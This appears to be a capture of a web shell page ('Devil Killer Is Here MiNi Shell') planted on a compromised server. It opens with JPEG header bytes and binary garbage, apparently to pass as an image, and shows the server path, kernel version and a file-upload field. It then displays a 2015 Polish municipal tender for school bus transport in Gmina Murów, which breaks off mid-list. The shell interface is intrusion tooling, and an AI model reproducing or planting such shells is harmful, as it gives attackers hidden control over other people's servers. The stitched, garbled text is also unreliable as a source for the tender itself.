JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150616/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150616/144900-N-2015.html

<p class="kh_header"><b>Murów: Dowóz uczniów wraz  z opiekunami  do szkół i przedszkoli na terenie Gminy Murów   w formie zakupu biletów miesięcznych w ramach przewozów regularnych na lata szkolne  2015/2016,2016/2017 oraz  dowóz uczniów z Publicznego Gimnazjum do sali  gimnastycznej - ( z podziałem na dwie części).</b><br>
<b>Numer ogłoszenia: 144900 - 2015; data zamieszczenia: 16.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Murów , ul. Dworcowa 2, 46-030 Murów, woj. opolskie, tel. 0-77 4214034, faks 0-77 4214032.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.murow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów wraz  z opiekunami  do szkół i przedszkoli na terenie Gminy Murów   w formie zakupu biletów miesięcznych w ramach przewozów regularnych na lata szkolne  2015/2016,2016/2017 oraz  dowóz uczniów z Publicznego Gimnazjum do sali  gimnastycznej - ( z podziałem na dwie części)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr I- Dowóz uczniów wraz z opiekunami do szkół i przedszkoli na terenie Gminy Murów w formie zakupu biletów miesięcznych w ramach przewozów regularnych na lata szkolne   2015/2016,2016/2017 :
2. Zakres zamówienia obejmuje:
    1)  Sprzedaż biletów miesięcznych dla uczniów dojeżdżających do szkół    
         podstawowych,    gimnazjum i dzieci do przedszkoli na terenie Gminy Murów i z 
         powrotem we wszystkie dni nauki szkolnej zgodnie z zestawieniem dojazdów 
         uczniów do szkół i  przedszkoli  stanowiącym załącznik nr 1 do SIWZ. 
         Zamówienie będzie realizowane  w ramach przewozów regularnych w 
         Krajowym  transporcie drogowym na podstawie  ustawy z dnia 6 września 
         2001r. o transporcie drogowym (Dz.U. z 2013r poz.1414).
    2)   Dopuszcza się, o ile będą miejsca w autobusach/busach , przewozy innych   
         osób,   które  będą ponosić koszty przejazdu na rzecz przewoźnika, z 
         zastrzeżeniem zapisów  ustawy z 20 czerwca 1992r. o uprawnieniach do 
         ulgowych przejazdów środkami  publicznego   transportu zbiorowego (Dz.U. z 
        2012r.poz.1138 z późn. zm.).
   3)   Uczeń nie może być wcześniej w placówce oświatowej niż pół godziny przed 
        godziną  rozpoczęcia zajęć lekcyjnych w szkole. Faktyczne  godziny odjazdów   
        autobusów Wykonawca  ustali z dyrektorami poszczególnych szkół   przedszkoli.
   4)  Wykonawca jest zobowiązany zapewnić punktualny i bezpieczny dowóz uczniów 
        do szkół i dzieci do przedszkoli.
   5)  Ilość i wielkość pojazdów na danym odcinku dostosować należy do ilości 
        przewożonych uczniów i dzieci do przedszkoli.
   6)  Łączna liczba uczniów do przewiezienia do szkół i przedszkoli i z powrotem  
        wynosi 236 w tym: 213 uczniów i dzieci przedszkolnych dowożonych w w 
        formie zakupu biletów miesięcznych  i 23 dzieci dowożonych do przedszkoli nie 
        objętych biletami miesięcznymi. Dzienna trasa dowozu wynosi około 360 km.
  7)   Długość tras może ulec zmianie po przeprowadzeniu wizji lokalnej przed 
        sporządzeniem oferty.
  8)   Wykonawca zapewni bezpłatny przejazd opiekunom wyznaczonym na danej 
        trasie,  opiekę w trasie  dowożenia zapewnia Zamawiający.
  9)   W przypadku awarii wyznaczonego autobusu Wykonawca podstawi 
        niezwłocznie , nie później jednak niż w ciągu 60 minut od powstania awarii, 
        autobus spełniający właściwe  wymagania techniczne w ruchu drogowym. W 
       przypadku niemożności zrealizowania przewozu Wykonawca pokryje  dodatkowo 
        koszty przewozu wynikłe z wykonania  usługi przez podmiot zastępczy wybrany 
        przez Zamawiającego.
10)   Wykonawca uwzględni możliwość sporadycznych zmian godzin dowozu uczniów i 
        odbiór wynikających z organizacji pracy szkoły czy przedszkola.
11)   Z uwagi na utrudniony manewr nawracania na drodze w miejscowości Święciny i 
        w  miejscowości Okoły Zamawiający przewiduje na tych trasach dowóz uczniów 
        busami.
12)    W przypadku odmiennej organizacji pracy szkoły i skrócenia zajęć lekcyjnych
         np. w dniu rekolekcji, dni sprawdzianów i egzaminów zewnętrznych, sprzątanie
         świata,  w  przeddzień ferii świątecznych itp. Wykonawca zapewni odwóz 
        uczniów we     wcześniejszych godzinach. Wcześniejsza organizacja odwozów 
        nie stanowi  dodatkowych    zadań, należy je wkalkulować w cenę biletów.
13)    Ostateczna ilość kursów powrotnych wynikająca z organizacji pracy szkoły z 
       uwzględnieniem przystanków oraz ewentualnych innych punktów odbioru dzieci 
        na  trasach uzgodnionych z Wykonawcą,  zostaną określone po sporządzeniu 
       planu zajęć w  jednostkach oświatowych pomiędzy Dyrektorami Szkół i 
        Przedszkoli a Wykonawcą.  Wykaz przystanków stanowi załącznik nr 2 do SIWZ.
14)   Bilety miesięczne będą przekazywane poszczególnym dyrektorom szkół i 
        przedszkoli  przez Wykonawcę najpóźniej do dnia 20 miesiąca poprzedzającego 
       miesiąc wykonania  zamówienia. Wykonawca na podstawie załącznika nr 3 do 
        SIWZ będzie wystawiał  fakturę i  przekaże ją Zamawiającemu.
15)    Rozkład jazdy autobusów musi przewidywać przystanki w miejscowościach
        określonych    w zestawieniu. Na przystankach, o których mowa w zdaniu 
        poprzednim, Wykonawca jest zobowiązany umieścić dodatkową informację   
       (obok zwykłego rozkładu    jazdy) o   godzinach odjazdu i przyjazdów w ramach 
        niniejszej umowy.

Miejsce wykonywania zamówienia
  1. Publiczna Szkoła Podstawowa w Murowie ul. Wolności 20
  2. Publiczna Szkoła Podstawowa w Starych Budkowicach ul. Wołczyńska 14
  3. Publiczne Gimnazjum w Zagwiździu ul. Lipowa 68
  4. Publiczne Przedszkole w Murowie ul. Lipowa 17
  5. Publiczne Przedszkole w Starych Budkowicach ul. Wołczyńska 2
  6. Publiczne Przedszkole w Zagwiździu ul. Lipowa 12A

Każdy Wykonawca winien przeprowadzić wizję lokalną w celu uzyskania wszelkich informacji koniecznych do przygotowania oferty, szczególnie zaleca się sprawdzenie kilometrów na poszczególnych trasach i dostosowanie jej do ilości dojeżdżających uczniów oraz posiadanego taboru, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy. Koszt wizji lokalnej ponosi Wykonawca

Zadanie częściowe nr II- Dowóz uczniów wraz z opiekunami  z Publicznego Gimnazjum w Zagwiździu do sali gimnastycznej w  Zagwiździu .
  1) Przewóz uczniów na zajęcia wychowania fizycznego z Publicznego Gimnazjum w 
      Zagwiździu do sali gimnastycznej w Zagwiżdziu, zgodnie z harmonogramem 
      przejazdów opracowanym przez Dyrektora Publicznego Gimnazjum w Zagwiździu  
      po sporządzeniu planu zajęć w Publicznym Gimnazjum w terminie do 26 sierpnia 
      każdego  roku wykonywanej usługi.

  2)   Ilość kursów: 
        poniedziałek  - dowóz  do sali i powrót- 2 kursy 
        orientacyjna ilość kilometrów do przejechania 3,60 km
        wtorek- dowóz do sali  i powrót - 3 kursy
        orientacyjna ilość kilometrów do przejechania  5,40km
        środa - dowóz do sali i powrót - 2 kursy
        orientacyjna ilość kilometrów do przejechania 3,60 km
        czwartek - dowóz do Sali i powrót - 1 kurs
        orientacyjna ilość kilometrów do przejechania 1,80 km
        piątek - dowóz do sali i powrót - 2 kursy 
        orientacyjna ilość kilometrów do przejechania 3,60 km
Należy rozumieć 1 kurs jako dowóz z Gimnazjum  do sali i powrót.
W ciągu tygodnia średnio 2 kursy dziennie.
  3)  Orientacyjna liczba uczniów przewożona jednym kursem od 18  do 22.
       Podane liczby uczniów oraz ilość kursów w danym dniu tygodnia są liczbami 
       aktualnymi na dzień ogłoszenia o zamówieniu publicznym. 
      Szczegółowy harmonogram przewozu uczniów zostanie opracowany przez 
      Dyrektora Publicznego Gimnazjum w Zagwiździu i przekazany Wykonawcy do dnia 
      26 sierpnia  danego roku szkolnego objętego zamówieniem. Harmonogram 
      stanowić będzie  załącznik do umowy
 4)  Wykonawca musi dysponować minimum jednym autobusem z kierowcą - z ilością 
       miejsc siedzących zapewniającą obsługę wymaganej ilości uczniów.
 5)   Wykonawca zapewni bezpłatny przejazd opiekunowi, opiekę w trakcie dowożenia 
       zapewnia Zamawiający.
 6)   W przypadku awarii wyznaczonego autobusu Wykonawca podstawi niezwłocznie 
      autobus spełniający właściwe wymagania techniczne w ruchu drogowym. W 
      przypadku  niemożności zrealizowania przewozu Wykonawca pokryje dodatkowo 
      koszty przewozu   wynikłe z wykonania  usługi  przez podmiot zastępczy 
      wybrany przez Zamawiającego.
 7)   Pojazd służący do przewozu uczniów musi być oznakowany zgodnie z przepisami 
       prawa o ruchu drogowym i transporcie osób.
 8)  Zamawiający nie dopuszcza wykonania usługi w ramach regularnej komunikacji    
       autobusowej za sprzedażą biletów miesięcznych.

Miejsce wykonywania zamówienia:
 Publiczne Gimnazjum Zagwiździe ul. Lipowa 68
 Sala gimnastyczna Zagwiździe ul. Lipowa 1

Każdy Wykonawca winien przeprowadzić wizję lokalną trasy- w celu uzyskania wszelkich informacji koniecznych do przygotowania oferty, szczególnie należy sprawdzić ilość kilometrów na trasie, gdyż wyklucza się możliwość roszczeń z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
Koszt wizji lokalne ponosi Wykonawca..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenia  zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 Prawa zamówień publicznych .
Przedmiotem zamówień uzupełniających jest powtórzenie tego samego rodzaju prac co w zamówieniu podstawowym , stanowiących nie więcej niż 10% wartości zamówienia podstawowego zgodnie z art. 67 ust. 1 pkt. 6 Prawa zamówień publicznych .</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.11.50.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium.
 Ustala się wadium w wysokości: 
    1.  5.100,00złotych, słownie: pięć tysięcy sto złotych- dla zadania częściowego 
         nr I
    2.  500,00złotych  słownie: pięćset złotych - dla zadania częściowego nr II

    3. Wadium należy wnieść przed terminem składania ofert, określonego  w 
      Rozdziale 12 niniejszej SIWZ, przy czym za termin wniesienia  wadium w formie 
     pieniężnej za pomocą przelewu bankowego Zamawiający będzie  uważał za 
     skuteczne tylko wówczas, gdy bank prowadzący rachunek  Zamawiającego
     potwierdzi, że otrzymał taki przelew przed upływem terminu  składania ofert. 
 4.   Wadium może być wnoszone w jednej lub kilku następujących formach:
          1 -  w pieniądzu,
          2 -  w poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
                oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze 
                poręczeniem pieniężnym,
          3 -  w gwarancjach bankowych
          4-   w gwarancjach ubezpieczeniowych,
          5 -  w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b 
              ust.  5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji 
              Rozwoju  Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158, z późn. zm).
Wadium wnoszone w pieniądzu wpłaca się PRZELEWEM na rachunek bankowy   
Zamawiającego Bank  Spółdzielczy Łubniany  Nr  21 8897 0004 2001 0006 0163 0003  z  dopiskiem Wadium -Dowóz uczniów wraz  z opiekunami  do szkół i przedszkoli na terenie Gminy Murów w formie zakupu biletów miesięcznych w ramach przewozów regularnych  na  lata szkolne  2015-2016, 2016-2017 - zadanie częściowe nr I 
lub  Dowóz uczniów z Publicznego Gimnazjum do sali   gimnastycznej  - zdanie częściowe nr II
Do oferty należy dołączyć kopię polecenia przelewu lub kserokopię potwierdzoną za     zgodność z oryginałem- przez osoby odpowiednio upoważnione do reprezentowania.
Wadium wnoszone w formie poręczeń lub gwarancji winno być złożone w oryginale.
Oryginał dokumentu wraz z jego kopią ( potwierdzoną za zgodność z oryginałem) należy dołączyć do oferty. Oryginał należy załączyć do oferty w taki sposób, aby umożliwić zamawiającemu jego wyjęcie i zwrot bez uszkodzenia.          

4. Wadium składane w formie gwarancji i lub poręczenia, gwarancja i lub poręczenie   
      powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać, 
      między  innymi następujące elementy: 
       1- nazwę dającego zlecenie Wykonawcy , beneficjenta gwarancji i lub
          poręczenia  Zamawiającego,gwaranta i lub poręczyciela (banku lub 
          instytucji ubezpieczeniowej  udzielających gwarancji i lub poręczenia) oraz 
          wskazanie ich siedzib.
      2-  dokładne przytoczenie nazwy i przedmiotu niniejszego postępowania
      3- precyzyjne określenie wierzytelności, która ma być zabezpieczona gwarancją 
          i lub  poręczeniem,
      4-  kwotę gwarancji i lub poręczenia,
      5-  termin ważności gwarancji i lub poręczenia 
      6-  zobowiązanie gwaranta i lub poręczyciela do: nieodwołalnego i
          bezwarunkowego zapłacenia kwoty gwarancji i lub poręczenia na pierwsze 
          pisemne żądanie  Zamawiającego zawierającego oświadczenie, iż:
            - Wykonawca w odpowiedzi na wezwanie do uzupełnienia oświadczeń, 
          dokumentów  lub pełnomocnictw o którym mowa w art. 26 ust. 3 Ustawy 
          Pzp., nie złożył wymaganych   dokumentów lub oświadczeń, o których  mowa 
          w art. 25 ust. 1 Ustawy Pzp. lub pełnomocnictw, listy podmiotów należących 
         do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub 
          informacji  o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na 
          poprawienie omyłki , o której mowa w art. 87 ust. 2 pkt 3, co powodowało 
          brak możliwości wybrania oferty złożonej przez Wykonawcę jako 
          najkorzystniejszej chyba, że Wykonawca udowodni, że wynika to z przyczyn 
          nieleżących  po jego stronie, lub
           -  Wykonawca, którego ofertę wybrano odmówił podpisania umowy na 
           warunkach  określonych w ofercie , lub
           -  Wykonawca, którego ofertę wybrano nie wniósł zabezpieczenia należytego 
               wykonania umowy, lub
           -  zawarcie umowy, z Wykonawcą, którego ofertę wybrano, stało się 
              niemożliwe z przyczyn leżących po stronie Wykonawcy;
         7) okres ważności gwarancji i/ lub poręczenia nie może być  krótszy niż okres   
             związania ofert.
5.  Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze 
     najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem   
     Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza. 
6.  Wykonawcy , którego oferta zostanie wybrana jako najkorzystniejsza 
     Zamawiający zwróci wadium niezwłocznie po zawarciu umowy .
7.    Zamawiający zwróci niezwłocznie wadium  wraz z odsetkami na wniosek 
      Wykonawcy,  który wycofał ofertę przed terminem składania ofert.
8.   W sprawie wadium obowiązują uregulowania ustawy- Prawo zamówień 
      publicznych zawarte w art. 45 i 46.
9.   Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje 
      wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp.
10.  W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia 
      wadium  w każdej z dopuszczalnych form może być wniesione przez jednego, 
      kilku lub wszystkich Wykonawców, pod warunkiem, iż łączna wysokość  
      wniesionego wadium odpowiadać będzie wymaganej kwocie. W takim przypadku 
      składając wadium należy wskazać w imieniu kogo i tytułem jakiego postępowania 
      jest wnoszone.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania częściowego nr I:
1.O udzielenie zamówienia ubiegać się mogą wszyscy Wykonawcy, którzy:
   Spełniają warunki określone w art. 22  ust. 1 ustawy PzP, dotyczące:
    posiadania uprawnień do wykonywania określonej działalności lub czynności, 
     jeżeli    przepisy prawa nakładają obowiązek ich posiadania tj; 
       posiadają aktualną licencję na wykonywanie na przewóz osób pojazdami
       samochodowymi, zgodnie z Ustawą z dnia 6 września 2001r. o transporcie   
      drogowym  (t.j Dz.U. z 2013r  poz. 1414 z późn. zm.)  
 Dla zadania częściowego nr II
1.O udzielenie zamówienia ubiegać się mogą wszyscy Wykonawcy, którzy:
   Spełniają warunki określone w art. 22  ust. 1 ustawy PzP, dotyczące:
    posiadania uprawnień do wykonywania określonej działalności lub czynności, 
      jeżeli   przepisy prawa nakładają obowiązek ich posiadania tj; 
      posiadają aktualną licencję na wykonywanie na przewóz osób pojazdami
      samochodowymi, zgodnie z Ustawą z dnia 6 września 2001r. o transporcie 
      drogowym   (t.j Dz.U. Z 2013r. poz. 1414 z późn. zm.)  
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w 
 postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofert oświadczenia  i dokumenty wg. metody spełnia - nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania częściowego nr I:
 posiadania wiedzy i doświadczenia, tj. wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług  w okresie ostatnich trzech  lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-  w tym okresie co najmniej:  dwa  zadania  polegające na dowozie dzieci do szkół lub  przedszkoli o wartości minimum 80.000,00zł brutto każde, realizowane   nieprzerwalnie w  okresie  10 m-cy.
Dla zadania częściowego nr II:
Zamawiający nie dokonuje opisu sposobu oceny spełniania tego warunku. Zamawiający     uzna warunek za spełniony na podstawie stosownego oświadczenia złożonego zgodnie  ze wzorem określonym w załączniku nr  4 do SIWZ.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w 
 postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofert oświadczenia  i dokumenty wg. metody spełnia - nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania częściowego nr I:
Dysponowania odpowiednim potencjałem technicznym tj.: posiadają  lub mają dostęp do odpowiedniej ilości taboru samochodowego niezbędnego do wykonania niniejszego zamówienia- dysponują co najmniej:
3 sprawnymi autobusami 
 2 sprawnymi busami.
Dla zadania częściowego nr II:
Dysponowania odpowiednim potencjałem technicznym tj.:posiadają  lub mają dostęp do odpowiedniej ilości taboru samochodowego niezbędnego 
do wykonania niniejszego zamówienia- dysponują co najmniej:
  1  sprawnym  autobusem 
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w 
 postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofert oświadczenia  i dokumenty wg. metody spełnia - nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania częściowego nr I:
Dysponowania  osobami zdolnymi do wykonania zamówienia tj:
Wykonawca zobowiązany jest wskazać ,że dysponuje lub będzie dysponował co   najmniej 5 kierowcami autobusów , którzy posiadają ważne prawo jazdy kat. D, oraz  ważne świadectwo kwalifikacji lub zaświadczenie oraz min. 3 letnie  doświadczenie w 
zakresie przewozu osób.
Dla zadania częściowego nr II:
Wykonawca zobowiązany jest wskazać ,że dysponuje lub będzie dysponował co  najmniej jednym  kierowcą autobusu , posiadającym ważne prawo jazdy kat. D,  oraz  ważne świadectwo kwalifikacji lub zaświadczenie oraz min. 3 letnie 
doświadczenie w zakresie przewozu osób.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w 
 postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofert oświadczenia  i dokumenty wg. metody spełnia - nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania częściowego nr I:
Zamawiający nie dokonuje opisu sposobu oceny spełniania tego warunku. Zamawiający   uzna warunek za spełniony na podstawie stosownego oświadczenia złożonego zgodnie  ze wzorem określonym w załączniku nr  4 do SIWZ.
Dla zadania częściowego nr II:
Zamawiający nie dokonuje opisu sposobu oceny spełniania tego warunku. Zamawiający   uzna warunek za spełniony na podstawie stosownego oświadczenia złożonego zgodnie  ze wzorem określonym w załączniku nr  4 do SIWZ.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w 
 postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofert oświadczenia  i dokumenty wg. metody spełnia - nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

